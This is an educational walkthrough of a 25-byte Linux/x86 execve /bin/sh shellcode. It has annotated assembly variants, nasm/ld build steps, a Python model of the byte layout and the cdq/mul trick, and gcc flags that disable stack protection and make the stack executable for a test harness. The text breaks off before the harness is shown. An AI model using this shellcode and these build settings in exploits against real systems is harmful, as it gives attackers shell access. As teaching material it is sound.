Linux/x86 - execve /bin/sh Shellcode (25 bytes) Walkthrough

Reference: Linux/x86 - execve /bin/sh Shellcode (25 bytes)
shellcode.asm
global _start

section .text
_start:
cdq ; edx = sign bit of eax spread over 32 bits: clears edx without a NUL byte, but only when eax is non-negative
mul edx ; edx:eax = eax * edx = 0, so both eax and edx are now 0 (relies on edx being 0 after cdq)
lea ecx, [eax] ; ecx = eax = 0 (argv = NULL); can misbehave when embedded in a host program that left eax negative
mov esi, 0x68732f2f ; "//sh" little-endian; the doubled '/' pads "/bin/sh" to 8 bytes so no NUL is needed in the immediate
mov edi, 0x6e69622f ; "/bin" little-endian
push ecx ; NUL terminator for the string
push esi ; "//sh"
push edi ; "/bin"; memory at [esp] now reads "/bin//sh\0"
lea ebx, [esp] ; ebx = address of "/bin//sh" (pathname argument)
mov al, 0xb ; execve syscall number; writing al instead of eax avoids NUL bytes in the encoding
int 0x80 ; enter the kernel

Compile and link:

nasm -f elf32 shellcode.asm -o shellcode.o
ld -m elf_i386 -o shellcode shellcode.o

Debug with r2:

Breakpoint at syscall:

execve:

execve
#include <unistd.h>

int execve(const char *pathname, char *const argv[], char *const envp[]);

This version is derived from the shellcode above, to make the concept clearer:

shellcode-2.asm
global _start

section .text
_start:
xor eax, eax ; zero eax explicitly so the code also works inside a host program
xor edx, edx ; envp = NULL
xor ecx, ecx ; argv = NULL
push ecx ; NUL terminator
push 0x68732f6e ; "n/sh" little-endian
push 0x69622f2f ; "//bi" little-endian; memory at [esp] now reads "//bin/sh\0"
lea ebx, [esp] ; ebx = address of "//bin/sh"
mov al, 0xb ; execve
int 0x80 ; enter the kernel

The xor instructions are not needed when the shellcode runs as its own program: Linux zeroes the general-purpose registers when it starts a new ELF process, so eax, ecx and edx are already 0 at _start:

shellcode-standalone.asm
global _start

section .text
_start:
push ecx ; NUL terminator; ecx is 0 at ELF entry (argv = NULL)
push 0x68732f6e ; "n/sh" little-endian
push 0x69622f2f ; "//bi" little-endian; memory at [esp] now reads "//bin/sh\0"
; edx is also 0 at ELF entry (envp = NULL)
lea ebx, [esp] ; ebx = address of "//bin/sh"
mov al, 0xb ; execve (eax is 0 at entry, so only the low byte needs setting)
int 0x80 ; enter the kernel
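
The three listings above rely on two things that are easy to get wrong when reading them: the pushed immediates only spell a path once you account for little-endian byte order and the reverse push order, and the register-clearing tricks must not introduce 0x00 bytes. The following Python script is an added illustration, not part of the original walkthrough; it uses only the immediate values from the listings and models the `cdq; mul edx` sequence to show when it fails to zero eax and edx (it does not assemble or run any shellcode).

```python
import struct

# Immediates exactly as they appear in the listings on this page, listed
# starting with the word that is pushed LAST (i.e. sits at the lowest address).
ORIGINAL = (0x6e69622f, 0x68732f2f)   # shellcode.asm: edi ("/bin") then esi ("//sh")
DERIVED = (0x69622f2f, 0x68732f6e)    # shellcode-2.asm / standalone: two push imm32


def stack_string(words_low_to_high):
    """Bytes the CPU sees at [esp] after the pushes.

    Each 32-bit word is laid out little-endian, followed by the dword of
    zeros that the pushed ecx contributes as the NUL terminator.
    """
    data = b"".join(struct.pack("<I", w) for w in words_low_to_high)
    return data + struct.pack("<I", 0)


def pathname(words_low_to_high):
    """The C string execve receives via ebx: everything up to the first NUL."""
    raw = stack_string(words_low_to_high)
    return raw[: raw.index(b"\x00")].decode()


def has_nul_byte(imm32):
    """True if encoding imm32 embeds a 0x00 byte (a string copy would stop there)."""
    return b"\x00" in struct.pack("<I", imm32)


def needs_padding(path):
    """Number of extra '/' needed so the path fills whole 4-byte words."""
    return (-len(path)) % 4


def cdq_mul(eax):
    """Model 'cdq; mul edx' on 32-bit x86 and return the resulting (eax, edx)."""
    eax &= 0xFFFFFFFF
    edx = 0xFFFFFFFF if eax & 0x80000000 else 0   # cdq: sign-extend eax into edx
    product = eax * edx                           # mul edx: edx:eax = eax * edx
    return product & 0xFFFFFFFF, product >> 32


if __name__ == "__main__":
    print(pathname(ORIGINAL))   # -> /bin//sh
    print(pathname(DERIVED))    # -> //bin/sh
    for label, imms in (("original", ORIGINAL), ("derived", DERIVED)):
        print(label, [hex(i) for i in imms],
              "NUL-free:", not any(has_nul_byte(i) for i in imms))
    print("padding needed for /bin/sh:", needs_padding("/bin/sh"))   # -> 1
    print("cdq;mul with eax=5:", cdq_mul(5))                          # -> (0, 0)
    print("cdq;mul with eax=0x80000001:", cdq_mul(0x80000001))        # not zero
```

The padding check is the reason both variants carry a doubled slash: "/bin/sh" is seven bytes, so one extra '/' fills the second dword without a NUL, and the kernel's path lookup treats "//" the same as "/". The `cdq_mul` model makes the caveat on the original listing concrete: when eax has its sign bit set, cdq fills edx with 0xFFFFFFFF and the multiply no longer produces zero, which is why the derived version clears the registers with xor before reuse inside another program.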

On an x86_64 host, install the 32-bit toolchain and build the C harness for the derived version as a 32-bit binary with an executable stack:

apt install gcc-multilib
gcc -fno-stack-protector -z execstack -m32 ./shellcode.c

Add the shellcode into a C program: